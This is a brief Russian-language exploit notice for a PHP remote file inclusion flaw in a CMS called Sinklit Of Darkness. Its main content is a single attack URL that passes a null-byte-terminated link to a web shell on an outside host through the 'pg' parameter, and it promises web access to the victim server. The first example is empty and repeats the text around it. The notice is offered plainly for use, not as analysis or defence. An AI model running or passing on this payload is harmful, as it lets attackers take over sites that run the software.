PHP-иньекция в Sinklit Of Darkness CMS
Пример/Эксплоит:
Если в адресную строку браузера ввести:
,
то вы получите web-доступ к серверу.
Пример/Эксплоит:
Если в адресную строку браузера ввести:
Код:
http://victim.com/?pg=http://hack.ru/webshell.php%00то вы получите web-доступ к серверу.